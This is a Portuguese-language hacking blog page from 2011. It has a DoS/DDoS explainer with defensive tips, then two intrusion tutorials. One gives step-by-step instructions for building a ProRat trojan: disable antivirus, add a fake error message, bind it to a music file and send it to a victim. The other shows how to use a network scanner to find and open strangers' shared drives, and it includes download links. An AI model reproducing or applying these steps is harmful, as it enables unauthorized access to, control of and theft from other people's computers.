Nº De Visitantes

quarta-feira, 24 de agosto de 2011

Top Downloads

Programaa UteiS

#Pro Rat 1.9 FixServer#





Senha do Arquivo Rar : "pro"(sem aspas!)



#Languard Network Security Scanner GFI#








HACKER 171 - Dos e DDos

Hoje estou iniciando mais um quadro aqui no Mundo Dos Hackers, aonde irei falar sobre diversas técnicas hacker, explicando o funcionamento e finalidade das mesmas. Para começar vamos ver o que é, como funciona e como é feito (teoricamente) ataques do tipo DoS (Deinal of Service) e DDoS (Distributed Denial of Service), inclusive esses mesmos ataques foram usados para derrubar sites do Governo recentemente.

O que é um ataque DoS?

Ataques do tipo DoS (Denial Of Service) também conhecidos como negação de serviço, consistem em uma sobrecarga de um servidor ou computador comum, evitando que o mesmo atenda aos seus clientes, para fazer essa sobre carga, são usadas técnicas em que o atacante, no caso um hacker ou cracker, envie diversos pedidos de pacotes para o alvo de tal forma que o mesmo fique sobrecarregado e não consiga responder a mais nenhum pedido de pacote, dessa forma usuários comuns não conseguirão mais acessar os dados do servidor por ele não responder mais a pedidos.

Exemplificando de forma ilustrativa, imagine uma loja em que você sempre vai, essa loja tem uma certa capacidade de clientes que ela pode abrigar em seu espaço e que ela possa atender ao mesmo tempo. Em dias normais você vai até a loja, compra o que quer e vai embora. Agora imagine várias e várias pessoas entrando nessa mesma loja, ao mesmo tempo, apenas para pedir diversas informações sobre os produtos de forma que a loja fique extremamente lotada, se isso acontecer, você não vai conseguir entrar na loja, ou se conseguir entrar, não conseguirá pedir informações e nem comprar nada, é mais ou menos isso que ocorre em um ataque DoS.

No caso de ataques DoS, existe apenas um atacante, ou seja, um único computador faz vários pedidos de pacotes para o alvo, sendo assim, o atacante poderá derrubar apenas servidores fracos ou computadores comuns sem muito preparo e com pouca banda.

Bom, sabemos o que é DoS, mas como que o atacante consegue fazer vários pedidos de pacote ao mesmo tempo?

Existem diversas ferramentas que conseguem fazer pedidos contínuos de pacotes de vários protocolos, uma dessas ferramentas é a T50 Sukhoi PAK FA Mixed Packet Injector, desenvolvida por um brasileiro (Nelson Brito), com essas ferramentas o atacante pode fazer o ataque ao servidor.

O que é DDoS?

Como foi dito nos últimos parágrafos acima, os ataques DoS são feitos por um atacante, por isso é quase impossível derrubar um servidor robusto, é ai que entra o DDoS (Distributed Denial Of Service).

Os ataques do tipo DDoS consistem em vários computadores fazendo um ataque DoS ao mesmo tempo contra o mesmo alvo, ou seja, além do computador do atacante, vários outros computadores farão o mesmo ataque ao servidor alvo.

Levando novamente como exemplo a loja que você frequenta, seria como as várias pessoas que estivessem pedindo informações chamassem outras várias pessoas para sobrecarregar ainda mais a loja.

Para conseguir fazer com que vários computadores ataquem um mesmo alvo, os hackers e crackers infectam vários computadores com trojans que contém o programa utilizado para o ataque DoS mesclado, dessa forma, assim que o atacante der uma ordem, todos os computadores infectados irão atacar o mesmo alvo, ao mesmo tempo. Os computadores que são infectados por hackers e utilizados para ataques DDoS são chamados de zumbis.

Antigamente os Hackers e Crackers preferiam infectar servidores, para ataques DDoS, mas com a evolução da banda larga e a popularização da mesma entre usuários domésticos, hoje em dia é mais viável para um hacker ou cracker, infectar computadores domésticos, por ser mais fácil e por ter 80% de chances do computador ter uma banda larga de pelo menos 1 MB.

Veja abaixo um exemplo da hierarquia de um ataque DDoS:

O atacante é o mais alto na hierarquia, ele que da ordem de ataque para os computadores mestres, essa ordem consiste em ip ou domínio do alvo e informações extras como horário do ataque, quantidade de solicitações de pacotes, tamanho de pacotes, etc. Os computadores mestres repassam a ordem de ataque para o seu grupo de zumbis, feito isso os zumbis fazem o ataque. Essa hierarquia tem como objetivo dividir o serviço e esconder o atacante, no caso do exemplo acima, ao invés do atacante dar 6 ordens de ataque para os zumbis, ele da apenas 2 para os mestres que dão outras três para os seus zumbis.

Como são vários zumbis atacando um mesmo alvo e por trás deles ainda há um mestre, quando um ataque DDoS ocorre é quase impossível descobrir quem é o verdadeiro autor do ataque, por isso na maioria das vezes o hacker ou cracker sai impune.

Hoje em dia grupos hackers mantém grandes redes com mais de 1 milhão de computadores zumbis, prontos para receberem ordens e atacarem um alvo em especifico, essas redes são chamadas de botnets e crescem a cada dia com a infecção de outros computadores que se juntam a rede de zumbis.

Com o ataque de vários computadores zumbis, por exemplo 1 milhão deles, até mesmo um servidor robusto não aguentaria as solicitações de todos os zumbis + os usuários comuns, então o servidor acaba caindo.

Em 2010 empresas grandes foram alvos de ataques DDoS como a Visa, Mastercard e Paypal. Nesse ano (2011) vários sites do governo brasileiro sofreram esse mesmo tipo de ataque e ficaram fora do ar.

Tanto em casos de ataques DoS quanto ataques DDoS, os atacantes não conseguem obter acesso a base de dados ou arquivos do servidor alvo, esses ataques tem como finalidade apenas derrubar o servidor sobrecarregando-o.

Como a policia investiga esses ataques?

Quando um ataque DDoS ocorre os peritos computacionais coletam o máximo de informações possíveis sobre o ataque. Analisam o servidor atacado, procuram saber se houve alguma falha explorada, se além do ataque DDoS o servidor alvo sofreu outro tipo de ataque, etc. A idéia é chegar o mais próximo possível do computador que deu o comando de ataque aos outros, para que assim possa chegar ao hacker ou cracker.

Como saber se o meu computador é um zumbi?

Os trojans que são usados para tornar computadores zumbis, não são comuns e fáceis de ser de detectados quanto os trojans ultrapassados que tem na Internet, ao contrário, eles são bem sofisticados e utilizam técnicas para se esconder dos antivírus e anti-spywares, por tanto mesmo com um bom antivírus o seu computador ainda pode se tornar um zumbi.

Para saber se o seu computador é um zumbi ou não, você precisa ficar de olho no tráfego da sua rede. Veja abaixo alguns sintomas de um computador zumbi:

* O computador fica enviando pacotes sem que o usuário esteja acessando algum serviço da Internet.

* O computador fica baixando pacotes sem que o usuário tenha autorizado.

* Internet lenta mesmo sem estar fazendo tarefas simultâneas na Internet.

* Computador lento sem estar sendo usado

Veja abaixo algumas medidas que podem evitar que o seu computador se torne um zumbi:

* Desligar o computador quando não estiver utilizando-o.

* Usar um bom Firewall (recomendo o COMODO).

* Usar um bom antivírus (melhor “com” do que “sem” :P ).

* Nunca baixar arquivos de sites suspeitos.

* Nunca baixar arquivos anexos a emails de remetentes que você não conheça.

* Tomar cuidado com os arquivos baixados por torrent ou compartilhadores P2P.

Sou administrador de um servidor, como evitar ataques DDoS?

Apesar de não ser possível bloquear 100% um ataque DDoS bem feito, sem tirar o servidor da tomada ou desconecta-lo da internet, há algumas medidas que podem ser tomadas para dificultar esses tipos de ataques, são elas:

* Utilizar um bom Firewall.

* Criar regras exclusivas e consistentes para o Firewall.

* Sempre atualizar o sistema operacional.

* Sempre atualizar a firmware de roteadores e dispositivos semelhantes.

* Sempre atualizar programas utilizados no servidor.

* Sempre manter uma boa vigilância dos pacotes trafegados na rede.

Se essas medidas forem seguidas, você conseguira evitar pelo menos ataques DDoS de pequena proporção, além é claro de outros possíveis ataques e invasões.

Bom, é com esse ultimo tópico que eu encerro essa matéria sobre DoS e DDoS que abriu o quadro “Técnicas Hacker” :D .

Não deixem de comentar ;) !!!

sexta-feira, 19 de agosto de 2011

Criando Cavalo de Troia

O ProRat é um dos melhores trojans da atualidade, com diversas funções e suporte a conexão reversa e a língua portuguesa (Brasil), o ProRat acabou virando o queridinho de muitos aprendizes de Hackers e até mesmo Hackers de elite, é isso mesmo “Hackers de elite”. Aproveitando esse tutorial sobre o ProRat eu vou tocar em um assunto que é muito comentado por quem esta no ramo de Hacking, os “Trojans” em geral. Muitos falam que trojans é coisa de Lammers e Noobs, bom isso é questão de opinião, mas se formos analisar bem, quem diz que trojans é coisa de lammer e noob esta totalmente errado, eu vou dizer porque!

1º Hackers de el

ite usam trojans!!! É isso mesmo, os Hackers usam trojans para fazer computadores Zumbis e usa-los em possíveis ataques DDOS ou até mesmo para manipular esses computadores zumbis para ataques de força bruta ou usa-los como escudo para possíveis imprevistos.

2º Um Hacker que se preze deve saber como que funciona um trojan, caso contrario ele não é um Hacker!

3º Trojans é um processo natural no qual todos aprendizes de Hacker devem passar, afinal, como você quer ir para os Exploits se você não sabe nem como funciona a conexão reversa e um trojan?


Para usar o prorat no seu PC vc precisa desativar temporariamente o seu anti virus (se ele for muito ruim nem precisa).


Com o Prorat vc cria trojans e manda para vitima e invadi o pc dela

Ele não é muito dificil de ser usado.

Criando servidor (Sever) basico:

1 - Faça o Download do ProRat aqui: Download
Senha: pro

2 - Abra o Prorat.

3 - Vá em Criar e Criar Servidor Prorat.

4 - Vá direto em configurações os outros vc se não meche.

5 - Dar uma mensagem de erro falsa> clique em mensagem e escreva oq quiser
eu coloco " Não foi possivel executar o arquivo" assim qnd a vitima executa-lo
vai pensar q não aconteceu nada.

6 - (Opcional) Se vc quiser vc pode juntar seu sever cm um arquivo seu ex:uma musica
basta juntar servidor com arquivo> Selecionar arquivo> e escolher um arquivo.

7 - Extenções não mecha,só qnd vc aprender mais.

8 - Icone se vc quiser vc pode colocar um icone bunitinho no seu sever basta clicar em algum.

9 - Agora é só clicar em Criar Servidor> Quando ele terminar de carregar se não me engano seu servidor irá para a pasta "Prorat 1.9 SE"

10 - Ok agora basta mandar o servidor para a vitima e fazer ela executar o sever!

Obs: para mandar por msn precisa compactalo para isso use Winrar ou outro negocio para compactar arquivo.

NÃO CLIKE NO SEVER Q VC PODE INFECTAR O SEU PROPRIO PC!!!!

NÃO NOS RESPONSABILIZAMOS POR NADA!!!!!!!

LINK PARA DOWNLOAD http://www.prorat.net/downloads.php?id=ProRat_v1.9_Fix2%28ZipPass:pro%29




Invadindo Pc a Distancia com LANGUARD NETWORK SECURITY SCANNER

Boas novas ! Nesse tutorial vou abordar o assunto "INVASÃO", utilizaremos a ferramenta "GFI Languard Network Security Scanner" que se encontra para download na seção de downloads ou simplesmente clicando aqui!
Após baixar o nosso programa instale o mesmo, não é necessario tutorial para isso, basta clicar no executável e seguir o passo a passo. Vamos agora conhecer a interface do programa:
Em "Target" colocamos o endereço IP que desejamos escanear e precionamos enter. O mesmo irá fazer um scann no IP que colocamos no alvo vamos ver como fica:
Ele está buscando por informações da máquina que estamos escaneando, buscando arquivos compartilhados, serviços, falhas e etc...
Ao final desse scanner encontrei apenas serviços rodando na maquina alvo,vejamos o que foi encontrado:
Bom, sarcasmo a parte esse scann não foi muito bem sucedido pois o alvo não possui vulnerabilidades realmente exploáveis, vamos buscar um outro com uma busca mais detalhada. Neste programa é possível fazer um scanner em uma faixa de ip, para isso basta colocar o primeiro IP separado por um "IFEN" do segundo, como assim??? Vejam a imagem:
Bom, por questões lógicas não utilizarei nenhum IP encontrado neste scann, no lugar disso farei um scann em um de meus servidores e demonstrarei se há alguma falha, vamos lá:
Nóssa !!! Nem eu sabia que tinha tanta coisa disponível assim. Como vocês podem ver eu acessei uma máquina e tenho controle até mesmo dos arquivos de registro da mesma, vamos abordar apenas a exploração dos arquivos do alvo.Navegue até a pasta "Shares", vamos ver:
Podemos ver que a unidade "C" esta compartilhada, era de se esperar já que o pc faz parte de uma rede de computadores, dando duplo clique na pasta "C" podemos ter acesso ao conteúdo da mesma, vamos dar uma olhadinha:
Feito !!! você invadiu!!! Porém como todo hacker que se preze vamos apenas dar uma olhadinha, não seriamos hackers se por acaso causassemos algo que venha a prejudicar um usuário que nem sabe que estamos espiando o seu computador, isso é coisa de scriptkiddie, porém, se você tem um motivo quem sou eu a questionar isto.
Considerações Finais.
Com este programa, acessando uma máquina é possível que você pegue arquivos, envie arquivos, modifique configurações e outras coisinhas mais de seu alvo, tudo é uma questão de imaginação.
Espero que tenham gostado do tutorial, em outra matéria abordarei o uso deste programa no escaneamento de sites. Até breve

Link paraDownload:http://www.easy-share.com/1908772783/Languard%20e%20Tutorial.rar

Read more: http://www.hack171.blogspot.com